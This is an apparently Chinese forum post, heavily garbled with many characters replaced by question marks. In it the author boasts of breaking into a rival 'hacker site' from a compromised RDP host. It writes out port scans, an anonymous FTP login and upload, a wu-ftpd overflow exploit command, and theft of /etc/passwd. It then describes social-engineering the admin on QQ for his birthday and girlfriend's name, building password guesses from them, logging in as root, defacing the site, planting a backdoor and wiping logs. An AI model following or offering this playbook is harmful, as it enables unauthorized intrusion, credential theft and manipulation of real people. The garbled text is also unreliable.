在qq上,有人以??木xxx著名黑客站?而自居,??之气,?在?人气?,想?,俺也是做黑客站?的, 

x年前上网的?候,??站??在娘胎里呢。?在是。。。。今天就??黑?黑。。。嘿嘿。。 

先?系?做?大致的了解。 

登?我?了3389的肉?,一切的准?工作都在上面做的。要小心啊,要不被?啄了眼可就不好了。 

用那?不?的工具“清?火焰”登?器上了肉?。打?cmd 

ping www.xxx.org,?有返回值,一定屏蔽了ping。看?象?管理?。 

不怕,?一下23端口 

telnet www.xxx.org 呀,是sun os 5.7 啊。??系?好象是不太好?呢。 

?始?描。 

其? ?描是通??用?程TCP/IP不同的端口的服?,并??目??予的回答,通??种方法,可以搜集到 

很多?于目?主机的各种有用的信息(比如:是否能用匿名登?!是否有可?的FTP目?,是否能用TELNET, 

HTTPD是用ROOT?是nobady在跑!)我?的?描器??有三?功能:??一?主机或网?的能力;一旦??一台主机,有??什么服?正?行在 

?台主机上的能力;通????些服?,??漏洞的能力。 

?始吧,?肉?上找到我?藏的目?,都是好?西呢。用(SuperScan)???有?相?的端口?告生成。 

?果:只有 21 23 80 1633 (??端口是什么,?告??出,管它呢) 

看?我?的目?只能放在 ftp (21)和http(80)了。 

先看有?有ftp匿名登?,??在??的很多站?都存在的。 

ftp www.xxx.org 

WUFU-FTP2.4.16 

user:ftp 

passwd:xxx.21cn.com (最好是??假的啊,呵呵) 

呵呵,??傻帽的管理??吹呢。,,,俺??了。。。。看看有什么?限?? 

ftp>ls 

user 
tmp 
welcome 
bin 
etc 
.... 
.... 

200 PORT Command successful. 

ftp>cd user (5555,?有?限的) 

ftp>cd temp 

200 PORT Command successful. 

ftp>put c:\boyhacker.txt 

200 PORT Command successful. 

哈哈!??目?是可?的。。。管理?你要完了。。 

ftp>bye 

我?得好象??了篇文章就是利用WUFU-FTP2.4.16本地溢出漏洞?的吧。。??,我??一下。 

但是溢出代?需??的。的找?SUN OS 的肉?啊。看?了??肉?的重要性了吧。 

#./wuftp www.xxx.com /tmp ftp/ftp@2.com -p 120 

connect..... 
send shell.... 
wait for you shell.... 

.......... 

呀呀呀呀,,,我在等??的?刻。。。。 

哇error.,完了,不是管理?啊。是我啊,?不去了。。放???回答:no 要有?黑客精神嘛。 

再?。 

不是?有?80端口???,托出?刀流光,(??牢?,有的人?,用流光的人不上?次,但是真的把流光用 

的好的,有真?性的?描未必低?)。??的?了几?,?。。。 

出?了,cgi漏洞只有几?: 

/class/mysql.class [漏洞描述] 
/images/ [漏洞描述] 
/manual/ [漏洞描述] 
/mysql/ [漏洞描述] 
/test/ [漏洞描述] 
gi">[漏洞描述] 

我?得好象??/class/mysql.class 漏洞可以直接查看mysql的user password 

可是?果?有成功。(?在才知道做黑客,?啊) 

但是,不要放?的。。不是?有?ect 目??》?先抓?密?再?。 

ftp > get /etc/passwd 

200 PORT Command successful. 

看看密?: 

df10% cat /etc/passwd 
root:x:0:1uper-User:/:/bin/ksh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
smtp:x:0:0:Mail Daemon User:/: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 
nobody:x:60001:60001:Nobody:/: 
noaccess:x:60002:60002:No Access User:/: 
nobody4:x:65534:65534unOS 4.x Nobody:/: 
rudi:x:9001:10::/rudi:/bin/csh 
liu:x:9002:10::/liu:/bin/csh 
peng:x:9003:10::/peng:/bin/csh 

呵呵?么多用?啊。。。。 

怎么?呢?做黑客要弄?子,要用智慧,我?定用上老米的社?工程?。 

休息。 

第2天,上qq,?那?吹的管理?聊起?了。以下是??的??: 

我:老大啊,你很?害啊,做了xxx黑客站?的管理?啊。 

x:一般了,我?网?好几年了。 

我:你是几几年上的网? 

x:不是很早,99年。 

我:呵呵,那你比我早啊,我是2003年上的网,那你是我的前?了 (?) 

x:是的吧 (靠,不??) 

我:我是82年11月21出生的,老哥是几几年啊? 

x: 我啊是80年10月26 ----------------(重?信息) 

我:最近啊,我和女朋友分手了,很怀念她。那??候不知道珍惜,老哥一定有女朋友吧 ------(?之以情) 

x: 是的啊,我女朋友和我差不多大的,我比她大1?月零1天。----------(哇,重?信息) 

我:呵呵,你的女朋友叫什么名字啊,网名一定很好听吧? 

x: 她啊,名字是我?的(我似乎看?他甜蜜的?子)kekeren ---------(有?) 


以下省略。。。。。] 

收集密?信息:801026 99801026 80925 80925521 kekeren80925 kekeren521---(我?你)kekerenx 

801026kekeren ------?之?可能的?合。 

接下?,到本文的?尾了,。。?吧。。。我是只用kekeren521就成功了。。看?他是?性情中人。。 


telnet www.xxx.org 

user:x 

passwd:kekeren521 

?到?在是不想?了。。?限是root,你想做任何你想做的事情。 

不?,我?是?更改主?,做?后?(很多方法的),拉??件下?,清除了pp跑了。。。 

?天,在上qq上,把id?了x,可笑的是,x?我漏洞不多,是怎么拿到root的,呵呵,希望老大x?到此文不要 

吐血。。。。